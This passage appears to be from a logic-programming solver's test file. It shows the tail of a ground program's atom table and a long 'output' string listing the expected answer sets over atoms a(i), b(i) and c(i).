16 b(9)
19 b(8)
22 b(7)
25 b(6)
28 b(5)
31 b(4)
34 b(3)
37 b(2)
40 b(1)
2 c(1)
3 c(2)
4 c(3)
5 c(4)
6 c(5)
7 c(6)
8 c(7)
9 c(8)
10 c(9)
11 c(10)
0
B+
0
B-
1
0
1
"""
output = """
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), a(8), b(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), a(9), b(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), a(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), a(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), a(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), a(10), b(9), b(8), b(7), b(6), b(5), a(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), a(5), b(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), a(6), b(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), a(7), b(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), a(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), a(8), b(7), b(6), b(5), b(4), a(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), a(4), b(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), a(5), b(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), a(6), b(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), a(3), b(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), a(4), b(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), a(2), b(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), a(3), b(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), a(5), b(4), b(3), a(2), a(1)}
{c(1), c(2), c(3), c(4), c(5), c(6), c(7), c(8), c(9), c(10), b(10), a(9), b(8), a(7), b(6), b(5), a(4), a(3), a(2), b(1)}
